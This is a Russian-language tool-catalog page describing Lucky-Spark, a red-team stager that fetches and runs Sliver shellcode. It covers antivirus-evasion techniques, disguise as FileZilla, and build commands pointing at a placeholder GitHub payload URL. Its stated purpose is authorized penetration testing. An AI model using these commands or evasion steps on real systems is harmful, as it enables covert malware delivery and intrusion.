Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Lucky-Spark — Скрытный загрузчик, предназначенный для полезных нагрузок (шеллкода), размещаемых через http/https, как в Sliver, или на raw-ссылках GitHub. | Kitploit
Инструменты/GitHubGitHub/schich/lucky-spark
ЭксплуатацияШелл-кодПост-эксплуатацияАнализ вредоносных программТестирование на ПроникновениеКомандование и УправлениеАнализ Бинарных ФайловRed TeamingРазработка Полезной Нагрузки
GitHubschich/lucky-spark

Lucky-Spark

Скрытный загрузчик, предназначенный для полезных нагрузок (шеллкода), размещаемых через http/https, как в Sliver, или на raw-ссылках GitHub.

58821 месяц назадПроверено Kitploit
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

LUCKY-SPARK

⟪ LUCKY-SPARK ⟫ — это стейджер, предназначенный для полезных нагрузок (shellcode), раздаваемых через http/https, например Sliver или GitHub raw. Он использует современные методы обфускации и обхода защиты, такие как скользящее окно JIT-дешифрования полезной нагрузки и патчинг инструкций процессора. По умолчанию создаётся исполняемый файл, маскирующийся под FTP-клиент FileZilla.


Возможности

  • Загрузчик поэтапных полезных нагрузок Sliver — загружает и выполняет полезную нагрузку Sliver с указанного сервера.
  • JIT-дешифрование shellcode — расшифровывает только скользящее окно полезной нагрузки, чтобы минимизировать её воздействие.
  • Выполнение на основе файбров — запускает shellcode внутри файбров для повышения скрытности и усложнения анализа.
  • Динамическое разрешение API — подозрительные или обнаруживаемые функции Windows API динамически загружаются во время выполнения.
  • Обфускация строк — чувствительные строки (например, URL, user-agent) шифруются с помощью аффинного шифра и хранятся в обфусцированном виде в скомпилированном бинарном файле.
  • Патчинг инструкций процессора — AES-инструкции процессора скрыты за безобидными инструкциями, такими как pmulqd, и патчатся после выполнения.
  • Автоматическая маскировка — EXE автоматически маскируется под FileZilla с правильным манифестом, информацией о версии и значками.
  • Настраиваемый User-Agent — поддерживается указание собственной строки User-Agent для сетевых запросов.

Установка

Склонируйте или скачайте репозиторий и убедитесь, что в вашей системе установлены make и .

mingw
root@kitploit:~
git clone <repository_url>
cd LUCKY-SPARK

Использование

Интерактивный режим

Запустите скрипт создания бинарного файла.

root@kitploit:~
./luckySpark.sh

Вас попросят ввести URL вашей поэтапной полезной нагрузки и, при желании, User-Agent. Interactive

В одну строку

Может быть выполнено одной строкой для включения в скрипты:

root@kitploit:~
./luckySpark.sh -u https://github.com/GITHUBNAME/PAYLOADREPO/raw/refs/heads/main/PAYLOAD.bin -a "Mozilla/5.0"

One Line

Рекомендации по полезной нагрузке

Если вы используете donut или Sliver (который использует donut), рекомендую следующие флаги для создания полезной нагрузки:

root@kitploit:~
donut.exe -i examplePayload.exe -a 2 -e 1 -z 1 -b 1 -o payload.bin

Это позволяет избежать подозрительного и помечаемого антивирусами поведения donut. Как ни странно, именно методы обхода donut чаще всего вызывают срабатывание детектов.

Запуск загрузчика

При этом создаётся бинарный файл filezilla.exe, который при запуске получает и выполняет полезную нагрузку.


Подготовка поэтапной полезной нагрузки

Этот стейджер был разработан для использования со Sliver. Подготовьте поэтапную полезную нагрузку Sliver, как описано здесь: Sliver Staging Не шифруйте полезную нагрузку.

Но подойдёт любой метод поэтапной подачи на основе http/https, например python3 -m http.server или полезная нагрузка, загруженная на github.com в публичный репозиторий.

Этот стейджер НЕ поддерживает протокол поэтапной подачи meterpreter.


Скользящее окно JITD

root@kitploit:~
Step 1: RIP hits Page 0 and Page 0 gets decrypted 
  Pages:           [  D  |  E  |  E  | ... ]
  RIP ->              ^

Step 2: RIP hits Page 1 and Page 1 gets decrypted 
  Pages:           [  D  |  D  |  E  | ... ]
  RIP ->                    ^

Step 3: RIP hits Page 2 and Page 2 gets decrypted. Page 0 gets encrypted
  Pages:           [  E  |  D  |  D  | ... ]
  RIP ->                          ^

Как это работает:

  1. Когда RIP попадает на защищённую страницу, обработчик VEH расшифровывает эту страницу.
  2. Самая старая страница в окне из трёх страниц повторно шифруется.
  3. Только последние две страницы остаются расшифрованными, остальные остаются защищёнными.
  4. Это «скользящее окно» перемещается вместе с RIP по мере выполнения кода.

VT


Безопасность и отказ от ответственности

LUCKY-SPARK предназначен только для образовательных, исследовательских целей и авторизованного тестирования на проникновение. Несанкционированное использование против систем без разрешения незаконно и неэтично.


Скачать инструмент